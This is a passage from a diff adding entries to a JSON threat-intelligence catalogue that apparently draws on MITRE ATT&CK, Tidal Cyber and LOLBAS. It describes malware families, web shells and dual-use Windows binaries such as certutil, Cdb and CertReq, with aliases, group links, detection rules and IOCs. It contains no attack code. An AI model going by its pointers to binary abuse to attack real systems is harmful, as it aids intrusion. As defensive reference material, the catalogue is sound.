+ }, + "related": [ + { + "dest-uuid": "a3b39b07-0bfa-4c69-9f01-acf7dc6033b4", + "type": "used-by" + }, + { + "dest-uuid": "8d9e758b-735f-4cbc-ba7c-32cd15138b2a", + "type": "similar" + } + ], + "uuid": "04deccb5-9850-45c3-a900-5d7039a94190", + "value": "Catchamas" + }, + { + "description": "[Caterpillar WebShell](https://app.tidalcyber.com/software/ee88afaa-88bc-4c20-906f-332866388549) is a self-developed Web Shell tool created by the group [Volatile Cedar](https://app.tidalcyber.com/groups/7c3ef21c-0e1c-43d5-afb0-3a07c5a66937).[[ClearSky Lebanese Cedar Jan 2021](https://app.tidalcyber.com/references/53944d48-caa9-4912-b42d-94a3789ed15b)] ", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0572", + "source": "MITRE", + "tags": [ + "311abf64-a9cc-4c6a-b778-32c5df5658be" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "7c3ef21c-0e1c-43d5-afb0-3a07c5a66937", + "type": "used-by" + }, + { + "dest-uuid": "751b77e6-af1f-483b-93fe-eddf17f92a64", + "type": "similar" + } + ], + "uuid": "ee88afaa-88bc-4c20-906f-332866388549", + "value": "Caterpillar WebShell" + }, + { + "description": "CC-Attack is a publicly available script that automates the use of open, external proxy servers as part of denial of service flood attacks. Its use has been promoted among the members of the Killnet hacktivist collective.[[Flashpoint Glossary Killnet](/references/502cc03b-350b-4e2d-9436-364c43a0a203)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Linux", + "Windows" + ], + "software_attack_id": "S5062", + "source": "Tidal Cyber", + "tags": [ + "62bde669-3020-4682-be68-36c83b2588a4" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "35fb7663-5c5d-43fe-a507-49612aa7960e", + "type": "used-by" + } + ], + "uuid": "7664bfa5-8477-4903-9103-1144113fca36", + "value": "CC-Attack" + }, + { + "description": "[CCBkdr](https://app.tidalcyber.com/software/4eb0720c-7046-4ff1-adfd-ae603506e499) is malware that was injected into a signed version of CCleaner and distributed from CCleaner's distribution website. [[Talos CCleanup 2017](https://app.tidalcyber.com/references/f2522cf4-dc65-4dc5-87e3-9e88212fcfe9)] [[Intezer Aurora Sept 2017](https://app.tidalcyber.com/references/b2999bd7-50d5-4d49-8893-8c0903d49104)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0222", + "source": "MITRE", + "tags": [ + "f2ae2283-f94d-4f8f-bbde-43f2bed66c55" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "b0f13390-cec7-4814-b37c-ccec01887faa", + "type": "similar" + } + ], + "uuid": "4eb0720c-7046-4ff1-adfd-ae603506e499", + "value": "CCBkdr" + }, + { + "description": "[ccf32](https://app.tidalcyber.com/software/e00c2a0c-bbe5-4eff-b0ad-b2543456a317) is data collection malware that has been used since at least February 2019, most notably during the [FunnyDream](https://app.tidalcyber.com/campaigns/94587edf-0292-445b-8c66-b16629597f1e) campaign; there is also a similar x64 version.[[Bitdefender FunnyDream Campaign November 2020](https://app.tidalcyber.com/references/b62a9f2c-02ca-4dfa-95fc-5dc6ad9568de)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S1043", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "a394448a-4576-41b8-81cc-9b61abad94ab", + "type": "similar" + } + ], + "uuid": "e00c2a0c-bbe5-4eff-b0ad-b2543456a317", + "value": "ccf32" + }, + { + "description": "[[Cdb.exe - LOLBAS Project](/references/e61b035f-6247-47e3-918c-2892815dfddf)]", + "meta": { + "id": "0b731b6d-60a7-4944-bf04-834591161b22", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "d9ea2696-7c47-44cd-8784-9aeef5e149ea", + "type": "similar" + } + ], + "uuid": "4e9c6329-2df3-4815-bf21-8f18de3046b0", + "value": "Cdb.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Debugging tool included with Windows Debugging Tools.\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x64\\cdb.exe\n* C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x86\\cdb.exe\n\n**Resources:**\n* [http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html](http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html)\n* [https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/cdb-command-line-options](https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/cdb-command-line-options)\n* [https://gist.github.com/mattifestation/94e2b0a9e3fe1ac0a433b5c3e6bd0bda](https://gist.github.com/mattifestation/94e2b0a9e3fe1ac0a433b5c3e6bd0bda)\n* [https://mrd0x.com/the-power-of-cdb-debugging-tool/](https://mrd0x.com/the-power-of-cdb-debugging-tool/)\n* [https://twitter.com/nas_bench/status/1534957360032120833](https://twitter.com/nas_bench/status/1534957360032120833)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_cdb.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_cdb.yml)\n* Elastic: [defense_evasion_unusual_process_network_connection.toml](https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml)\n* Elastic: [defense_evasion_network_connection_from_windows_binary.toml](https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml)\n* BlockRule: [https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules)[[Cdb.exe - LOLBAS Project](/references/e61b035f-6247-47e3-918c-2892815dfddf)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5208", + "source": "Tidal Cyber", + "tags": [ + "4479b9e9-d912-451a-9ad5-08b3d922422d", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "4e9c6329-2df3-4815-bf21-8f18de3046b0", + "type": "similar" + } + ], + "uuid": "d9ea2696-7c47-44cd-8784-9aeef5e149ea", + "value": "Cdb" + }, + { + "description": "[[CertOC.exe - LOLBAS Project](/references/b906498e-2773-419b-8c6d-3e974925ac18)]", + "meta": { + "id": "fbc3a6a8-5031-4aa5-8514-efbad5f87d4b", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "34e1c197-ac43-4634-9a0d-9148c748f774", + "type": "similar" + } + ], + "uuid": "53a36e49-d37d-4572-9f4c-f738db27d9a5", + "value": "CertOC.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Used for installing certificates\n\n**Author:** Ensar Samil\n\n**Paths:**\n* c:\\windows\\system32\\certoc.exe\n* c:\\windows\\syswow64\\certoc.exe\n\n**Resources:**\n* [https://twitter.com/sblmsrsn/status/1445758411803480072?s=20](https://twitter.com/sblmsrsn/status/1445758411803480072?s=20)\n* [https://twitter.com/sblmsrsn/status/1452941226198671363?s=20](https://twitter.com/sblmsrsn/status/1452941226198671363?s=20)\n\n**Detection:**\n* Sigma: [proc_creation_win_certoc_load_dll.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certoc_load_dll.yml)\n* IOC: Process creation with given parameter\n* IOC: Unsigned DLL load via certoc.exe\n* IOC: Network connection via certoc.exe[[CertOC.exe - LOLBAS Project](/references/b906498e-2773-419b-8c6d-3e974925ac18)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5087", + "source": "Tidal Cyber", + "tags": [ + "fb909648-ee44-4871-abe6-82c909c4d677", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "53a36e49-d37d-4572-9f4c-f738db27d9a5", + "type": "similar" + } + ], + "uuid": "34e1c197-ac43-4634-9a0d-9148c748f774", + "value": "CertOC" + }, + { + "description": "[[CertReq.exe - LOLBAS Project](/references/be446484-8ecc-486e-8940-658c147f6978)]", + "meta": { + "id": "179f9b33-8cc6-489f-9239-e16cb337b1a1", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "43050f80-ce28-49e3-aac6-cb3f4a07f4b4", + "type": "similar" + } + ], + "uuid": "e15e8ff8-4ca9-4c89-9a3a-b89e41623204", + "value": "CertReq.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Used for requesting and managing certificates\n\n**Author:** David Middlehurst\n\n**Paths:**\n* C:\\Windows\\System32\\certreq.exe\n* C:\\Windows\\SysWOW64\\certreq.exe\n\n**Resources:**\n* [https://dtm.uk/certreq](https://dtm.uk/certreq)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_susp_certreq_download.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_susp_certreq_download.yml)\n* IOC: certreq creates new files\n* IOC: certreq makes POST requests[[CertReq.exe - LOLBAS Project](/references/be446484-8ecc-486e-8940-658c147f6978)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5088", + "source": "Tidal Cyber", + "tags": [ + "35a798a2-eaab-48a3-9ee7-5538f36a4172", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "e15e8ff8-4ca9-4c89-9a3a-b89e41623204", + "type": "similar" + } + ], + "uuid": "43050f80-ce28-49e3-aac6-cb3f4a07f4b4", + "value": "CertReq" + }, + { + "description": "", + "meta": { + "id": "dc2187c3-8ad1-4d87-9c76-2618db516ec0" + }, + "related": [ + { + "dest-uuid": "2fe21578-ee31-4ee8-b6ab-b5f76f97d043", + "type": "similar" + } + ], + "uuid": "9d959b69-ce56-418b-b074-90d83062ca28", + "value": "certutil.exe" + }, + { + "description": "[certutil](https://app.tidalcyber.com/software/2fe21578-ee31-4ee8-b6ab-b5f76f97d043) is a command-line utility that can be used to obtain certificate authority information and configure Certificate Services. [[TechNet Certutil](https://app.tidalcyber.com/references/8d095aeb-c72c-49c1-8482-dbf4ce9203ce)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0160", + "source": "MITRE", + "tags": [ + "fdd53e62-5bf1-41f1-8bd6-b970a866c39d", + "d431939f-2dc0-410b-83f7-86c458125444", + "412da5b4-fb41-40fc-a29a-78dc9119aa75", + "758c3085-2f79-40a8-ab95-f8a684737927", + "af5e9be5-b86e-47af-91dd-966a5e34a186", + "35e694ec-5133-46e3-b7e1-5831867c3b55", + "1dc8fd1e-0737-405a-98a1-111dd557f1b5", + "15787198-6c8b-4f79-bf50-258d55072fee", + "303a3675-4855-4323-b042-95bb1d907cca", + "84615fe0-c2a5-4e07-8957-78ebc29b4635", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "5b1a5b9e-4722-41fc-a15d-196a549e3ac5", + "type": "used-by" + }, + { + "dest-uuid": "fb93231d-2ae4-45da-9dea-4c372a11f322", + "type": "used-by" + }, + { + "dest-uuid": "d01abdb1-0378-4654-aa38-1a4a292703e2", + "type": "used-by" + }, + { + "dest-uuid": "646e35d2-75de-4c1d-8ad3-616d3e155c5e", + "type": "used-by" + }, + { + "dest-uuid": "021b3c71-6467-4e46-a413-8b726f066f2c", + "type": "used-by" + }, + { + "dest-uuid": "f1477581-d485-403f-a95f-c56bf88c5d1e", + "type": "used-by" + }, + { + "dest-uuid": "3290dcb9-5781-4b87-8fa0-6ae820e152cd", + "type": "used-by" + }, + { + "dest-uuid": "47ae4fb1-fc61-4e8e-9310-66dda706e1a2", + "type": "used-by" + }, + { + "dest-uuid": "4ea1245f-3f35-5168-bd10-1fc49142fd4e", + "type": "used-by" + }, + { + "dest-uuid": "502223ee-8947-42f8-a532-a3b3da12b7d9", + "type": "used-by" + }, + { + "dest-uuid": "79be2f31-5626-425e-844c-fd9c99e38fe5", + "type": "used-by" + }, + { + "dest-uuid": "570198e3-b59c-5772-b1ee-15d7ea14d48a", + "type": "used-by" + }, + { + "dest-uuid": "0a68f1f1-da74-4d28-8d9a-696c082706cc", + "type": "similar" + }, + { + "dest-uuid": "9d959b69-ce56-418b-b074-90d83062ca28", + "type": "similar" + } + ], + "uuid": "2fe21578-ee31-4ee8-b6ab-b5f76f97d043", + "value": "certutil" + }, + { + "description": "[Chaes](https://app.tidalcyber.com/software/0c8efcd0-bfdf-4771-8754-18aac836c359) is a multistage information stealer written in several programming languages that collects login credentials, credit card numbers, and other financial information. [Chaes](https://app.tidalcyber.com/software/0c8efcd0-bfdf-4771-8754-18aac836c359) was first observed in 2020, and appears to primarily target victims in Brazil as well as other e-commerce customers in Latin America.[[Cybereason Chaes Nov 2020](https://app.tidalcyber.com/references/aaefa162-82a8-4b6d-b7be-fd31fafd9246)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0631", + "source": "MITRE", + "tags": [ + "4d767e87-4cf6-438a-927a-43d2d0beaab7" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "77e0ecf7-ca91-4c06-8012-8e728986a87a", + "type": "similar" + } + ], + "uuid": "0c8efcd0-bfdf-4771-8754-18aac836c359", + "value": "Chaes" + }, + { + "description": "[Chaos](https://app.tidalcyber.com/software/92c88765-6b12-42cd-b1d7-f6a65b2236e2) is Linux malware that compromises systems by brute force attacks against SSH services. Once installed, it provides a reverse shell to its controllers, triggered by unsolicited packets. [[Chaos Stolen Backdoor](https://app.tidalcyber.com/references/8e6916c1-f102-4b54-b6a5-a58fed825c2e)]", + "meta": { + "platforms": [ + "Linux" + ], + "software_attack_id": "S0220", + "source": "MITRE", + "tags": [ + "5e7433ad-a894-4489-93bc-41e90da90019", + "7e7b0c67-bb85-4996-a289-da0e792d7172" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "5bcd5511-6756-4824-a692-e8bb109364af", + "type": "similar" + } + ], + "uuid": "92c88765-6b12-42cd-b1d7-f6a65b2236e2", + "value": "Chaos" + }, + { + "description": "[CharmPower](https://app.tidalcyber.com/software/b1e3b56f-2e83-4cab-a1c1-16999009d056) is a PowerShell-based, modular backdoor that has been used by [Magic Hound](https://app.tidalcyber.com/groups/7a9d653c-8812-4b96-81d1-b0a27ca918b4) since at least 2022.[[Check Point APT35 CharmPower January 2022](https://app.tidalcyber.com/references/81dce660-93ea-42a4-902f-0c6021d30f59)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0674", + "source": "MITRE", + "tags": [ + "4d767e87-4cf6-438a-927a-43d2d0beaab7" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "7a9d653c-8812-4b96-81d1-b0a27ca918b4", + "type": "used-by" + }, + { + "dest-uuid": "7acb15b6-fe2c-4319-b136-6ab36ff0b2d4", + "type": "similar" + } + ], + "uuid": "b1e3b56f-2e83-4cab-a1c1-16999009d056", + "value": "CharmPower" + }, + { + "description": "Based on similarities in reported malware behavior and open source reporting, it is assessed that the malware named HAYMAKER by FireEye is likely the same as the malware ChChes. [[FireEye APT10 April 2017](https://app.tidalcyber.com/references/2d494df8-83e3-45d2-b798-4c3bcf55f675)] [[Twitter Nick Carr APT10](https://app.tidalcyber.com/references/0f133f2c-3b02-4b3b-a960-ef6a7862cf8f)]", + "meta": { + "id": "9ee89ef4-89b7-48c8-ba66-881269735924" + }, + "related": [ + { + "dest-uuid": "3f2283ef-67c2-49a3-98ac-1aa9f0499361", + "type": "similar" + } + ], + "uuid": "c65b2f44-b691-46e9-90da-2014a929ab35", + "value": "HAYMAKER" + }, + { + "description": "[[PWC Cloud Hopper Technical Annex April 2017](https://app.tidalcyber.com/references/da6c8a72-c732-44d5-81ac-427898706eed)]", + "meta": { + "id": "846bba3c-1b5c-4ee7-a31c-d58080beec72" + }, + "related": [ + { + "dest-uuid": "3f2283ef-67c2-49a3-98ac-1aa9f0499361", + "type": "similar" + } + ], + "uuid": "0b494f14-2546-4b8f-b688-9472f7e8dc7d", + "value": "Scorpion" + }, + { + "description": "[ChChes](https://app.tidalcyber.com/software/3f2283ef-67c2-49a3-98ac-1aa9f0499361) is a Trojan that appears to be used exclusively by [menuPass](https://app.tidalcyber.com/groups/fb93231d-2ae4-45da-9dea-4c372a11f322). It was used to target Japanese organizations in 2016. Its lack of persistence methods suggests it may be intended as a first-stage tool. [[Palo Alto menuPass Feb 2017](https://app.tidalcyber.com/references/ba4f7d65-73ec-4726-b1f6-f2443ffda5e7)] [[JPCERT ChChes Feb 2017](https://app.tidalcyber.com/references/657b43aa-ead2-41d3-911a-d714d9b28e19)] [[PWC Cloud Hopper Technical Annex April 2017](https://app.tidalcyber.com/references/da6c8a72-c732-44d5-81ac-427898706eed)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0144", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "fb93231d-2ae4-45da-9dea-4c372a11f322", + "type": "used-by" + }, + { + "dest-uuid": "dc5d1a33-62aa-4a0c-aa8c-589b87beb11e", + "type": "similar" + }, + { + "dest-uuid": "c65b2f44-b691-46e9-90da-2014a929ab35", + "type": "similar" + }, + { + "dest-uuid": "0b494f14-2546-4b8f-b688-9472f7e8dc7d", + "type": "similar" + } + ], + "uuid": "3f2283ef-67c2-49a3-98ac-1aa9f0499361", + "value": "ChChes" + }, + { + "description": "[Cherry Picker](https://app.tidalcyber.com/software/2fd6f564-918e-4ee7-920a-2b4be858d11a) is a point of sale (PoS) memory scraper. [[Trustwave Cherry Picker](https://app.tidalcyber.com/references/e09f639e-bdd3-4e88-8032-f665e347272b)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0107", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "b2203c59-4089-4ee4-bfe1-28fa25f0dbfe", + "type": "similar" + } + ], + "uuid": "2fd6f564-918e-4ee7-920a-2b4be858d11a", + "value": "Cherry Picker" + }, + { + "description": "[China Chopper](https://app.tidalcyber.com/software/723c5ab7-23ca-46f2-83bb-f1d1e550122c) is a [Web Shell](https://app.tidalcyber.com/technique/05a5318f-476d-44c1-8a85-9466295d31dd) hosted on Web servers to provide access back into an enterprise network that does not rely on an infected system calling back to a remote command and control server.[[Lee 2013](https://app.tidalcyber.com/references/6d1e2b0a-fed2-490b-be25-6580dfb7d6aa)] It has been used by several threat groups.[[Dell TG-3390](https://app.tidalcyber.com/references/dfd2d832-a6c5-40e7-a554-5a92f05bebae)][[FireEye Periscope March 2018](https://app.tidalcyber.com/references/8edb5d2b-b5c4-4d9d-8049-43dd6ca9ab7f)][[CISA AA21-200A APT40 July 2021](https://app.tidalcyber.com/references/3a2dbd8b-54e3-406a-b77c-b6fae5541b6d)][[Rapid7 HAFNIUM Mar 2021](https://app.tidalcyber.com/references/cf05d229-c2ba-54f2-a79d-4b7c9185c663)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0020", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f", + "311abf64-a9cc-4c6a-b778-32c5df5658be" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "eadd78e3-3b5d-430a-b994-4360b172c871", + "type": "used-by" + }, + { + "dest-uuid": "15ff1ce0-44f0-4f1d-a4ef-83444570e572", + "type": "used-by" + }, + { + "dest-uuid": "502223ee-8947-42f8-a532-a3b3da12b7d9", + "type": "used-by" + }, + { + "dest-uuid": "1bcc9382-ccfe-4b04-91f3-ef1250df5e5b", + "type": "used-by" + }, + { + "dest-uuid": "e5b0da2b-12bc-4113-9459-9c51329c9ae0", + "type": "used-by" + }, + { + "dest-uuid": "79be2f31-5626-425e-844c-fd9c99e38fe5", + "type": "used-by" + }, + { + "dest-uuid": "7094468a-2310-48b5-ad24-e669152bd66d", + "type": "used-by" + }, + { + "dest-uuid": "5a3a31fe-5a8f-48e1-bff0-a753e5b1be70", + "type": "similar" + } + ], + "uuid": "723c5ab7-23ca-46f2-83bb-f1d1e550122c", + "value": "China Chopper" + }, + { + "description": "[Chinoxy](https://app.tidalcyber.com/software/7c36563a-9143-4766-8aef-4e1787e18d8c) is a backdoor that has been used since at least November 2018, during the [FunnyDream](https://app.tidalcyber.com/campaigns/94587edf-0292-445b-8c66-b16629597f1e) campaign, to gain persistence and drop additional payloads. According to security researchers, [Chinoxy](https://app.tidalcyber.com/software/7c36563a-9143-4766-8aef-4e1787e18d8c) has been used by Chinese-speaking threat actors.[[Bitdefender FunnyDream Campaign November 2020](https://app.tidalcyber.com/references/b62a9f2c-02ca-4dfa-95fc-5dc6ad9568de)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S1041", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "0b639373-5f03-430e-b8f9-2fe8c8faad8e", + "type": "similar" + } + ], + "uuid": "7c36563a-9143-4766-8aef-4e1787e18d8c", + "value": "Chinoxy" + }, + { + "description": "Chisel is an open source tool that can be used for networking tunneling.[[U.S. CISA AvosLocker October 11 2023](/references/d419a317-6599-4fc5-91d1-a4c2bc83bf6a)] According to its GitHub project page, \"Chisel is a fast TCP/UDP tunnel, transported over HTTP, secured via SSH\".[[GitHub Chisel](/references/4a60fb46-06b7-44ea-a9f6-8d6fa81e9363)] Threat actors including ransomware operators and nation-state-aligned espionage actors have used Chisel as part of their operations.[[U.S. CISA AvosLocker October 11 2023](/references/d419a317-6599-4fc5-91d1-a4c2bc83bf6a)][[CISA AA20-259A Iran-Based Actor September 2020](/references/1bbc9446-9214-4fcd-bc7c-bf528370b4f8)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5063", + "source": "Tidal Cyber", + "tags": [ + "ed2b3f47-3e07-4019-a9bf-ec9d87f28c96", + "15787198-6c8b-4f79-bf50-258d55072fee", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "7094468a-2310-48b5-ad24-e669152bd66d", + "type": "used-by" + }, + { + "dest-uuid": "86b97a39-49c3-431e-bcc8-f4e13dbfcdf5", + "type": "used-by" + } + ], + "uuid": "bd2b2375-4f16-42b2-a862-959b5b41c2af", + "value": "Chisel" + }, + { + "description": "Chocolatey is a command-line package manager for Microsoft Windows.[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5028", + "source": "Tidal Cyber", + "tags": [ + "af5e9be5-b86e-47af-91dd-966a5e34a186", + "758c3085-2f79-40a8-ab95-f8a684737927", + "2185ed93-7e1c-4553-9452-c8411b5dca93", + "904ad11a-20ca-479c-ad72-74bd5d9dc7e4", + "1dc8fd1e-0737-405a-98a1-111dd557f1b5", + "35e694ec-5133-46e3-b7e1-5831867c3b55", + "15787198-6c8b-4f79-bf50-258d55072fee", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "d0f3353c-fbdd-4bd5-8793-a42e1f319b59", + "type": "used-by" + } + ], + "uuid": "7a2b00ef-8a37-4901-bf0c-17da0ebf3d69", + "value": "Chocolatey" + }, + { + "description": "[[Symantec APT28 Oct 2018](https://app.tidalcyber.com/references/777bc94a-6c21-4f8c-9efa-a1cf52ececc0)]", + "meta": { + "id": "0e7b706f-c6c5-4ea2-8d35-581e9448f229" + }, + "related": [ + { + "dest-uuid": "01c6c49a-f7c8-44cd-a377-4dfd358ffeba", + "type": "similar" + } + ], + "uuid": "cbdaa2bf-7ffb-4e48-9e8e-c06b42199d44", + "value": "Backdoor.SofacyX" + }, + { + "description": "[[ESET Sednit Part 2](https://app.tidalcyber.com/references/aefb9eda-df5a-437f-af2a-ec1b6c04628b)] [[FireEye APT28 January 2017](https://app.tidalcyber.com/references/61d80b8f-5bdb-41e6-b59a-d2d996392873)]", + "meta": { + "id": "5df20e72-bf08-4a95-b81b-a5ea73905b3e" + }, + "related": [ + { + "dest-uuid": "01c6c49a-f7c8-44cd-a377-4dfd358ffeba", + "type": "similar" + } + ], + "uuid": "14492dd1-4146-47ad-9ea0-5e6e934b625c", + "value": "SPLM" + }, + { + "description": "[[ESET Sednit Part 2](https://app.tidalcyber.com/references/aefb9eda-df5a-437f-af2a-ec1b6c04628b)] [[FireEye APT28 January 2017](https://app.tidalcyber.com/references/61d80b8f-5bdb-41e6-b59a-d2d996392873)]", + "meta": { + "id": "3f5b77e7-28ef-4e06-a2ba-d7188a5c4ab3" + }, + "related": [ + { + "dest-uuid": "01c6c49a-f7c8-44cd-a377-4dfd358ffeba", + "type": "similar" + } + ], + "uuid": "ceb44e2f-ffbb-4316-90a2-f011a3dcad57", + "value": "Xagent" + }, + { + "description": "[[ESET Sednit Part 2](https://app.tidalcyber.com/references/aefb9eda-df5a-437f-af2a-ec1b6c04628b)] [[FireEye APT28 January 2017](https://app.tidalcyber.com/references/61d80b8f-5bdb-41e6-b59a-d2d996392873)]", + "meta": { + "id": "f4762139-a9d6-4813-a6f8-168010eeec40" + }, + "related": [ + { + "dest-uuid": "01c6c49a-f7c8-44cd-a377-4dfd358ffeba", + "type": "similar" + } + ], + "uuid": "fabf19bb-0fc7-451c-8c69-4b6c706b4e3f", + "value": "X-Agent" + }, + { + "description": "[[FireEye APT28 January 2017](https://app.tidalcyber.com/references/61d80b8f-5bdb-41e6-b59a-d2d996392873)]", + "meta": { + "id": "4f9ad7bb-c277-4e1d-bf70-9711dbfa1334" + }, + "related": [ + { + "dest-uuid": "01c6c49a-f7c8-44cd-a377-4dfd358ffeba", + "type": "similar" + } + ], + "uuid": "472502d3-e94a-4045-a232-33733d6e30aa", + "value": "webhp" + }, + { + "description": "[CHOPSTICK](https://app.tidalcyber.com/software/01c6c49a-f7c8-44cd-a377-4dfd358ffeba) is a malware family of modular backdoors used by [APT28](https://app.tidalcyber.com/groups/5b1a5b9e-4722-41fc-a15d-196a549e3ac5). It has been used since at least 2012 and is usually dropped on victims as second-stage malware, though it has been used as first-stage malware in several cases. It has both Windows and Linux variants. [[FireEye APT28](https://app.tidalcyber.com/references/c423b2b2-25a3-4a8d-b89a-83ab07c0cd20)] [[ESET Sednit Part 2](https://app.tidalcyber.com/references/aefb9eda-df5a-437f-af2a-ec1b6c04628b)] [[FireEye APT28 January 2017](https://app.tidalcyber.com/references/61d80b8f-5bdb-41e6-b59a-d2d996392873)] [[DOJ GRU Indictment Jul 2018](https://app.tidalcyber.com/references/d65f371b-19d0-49de-b92b-94a2bea1d988)] It is tracked separately from the [X-Agent for Android](https://app.tidalcyber.com/software/).", + "meta": { + "platforms": [ + "Linux", + "Windows" + ], + "software_attack_id": "S0023", + "source": "MITRE", + "tags": [ + "febea5b6-2ea2-402b-8bec-f3f5b3f73c59", + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "5b1a5b9e-4722-41fc-a15d-196a549e3ac5", + "type": "used-by" + }, + { + "dest-uuid": "ccd61dfc-b03f-4689-8c18-7c97eab08472", + "type": "similar" + }, + { + "dest-uuid": "cbdaa2bf-7ffb-4e48-9e8e-c06b42199d44", + "type": "similar" + }, + { + "dest-uuid": "14492dd1-4146-47ad-9ea0-5e6e934b625c", + "type": "similar" + }, + { + "dest-uuid": "ceb44e2f-ffbb-4316-90a2-f011a3dcad57", + "type": "similar" + }, + { + "dest-uuid": "fabf19bb-0fc7-451c-8c69-4b6c706b4e3f", + "type": "similar" + }, + { + "dest-uuid": "472502d3-e94a-4045-a232-33733d6e30aa", + "type": "similar" + } + ], + "uuid": "01c6c49a-f7c8-44cd-a377-4dfd358ffeba", + "value": "CHOPSTICK" + }, + { + "description": "[Chrommme](https://app.tidalcyber.com/software/df77ed2a-f135-4f00-9a5e-79b7a6a2ed14) is a backdoor tool written using the Microsoft Foundation Class (MFC) framework that was first reported in June 2021; security researchers noted infrastructure overlaps with [Gelsemium](https://app.tidalcyber.com/software/9a117508-1d22-4fea-aa65-db670c13a5c9) malware.[[ESET Gelsemium June 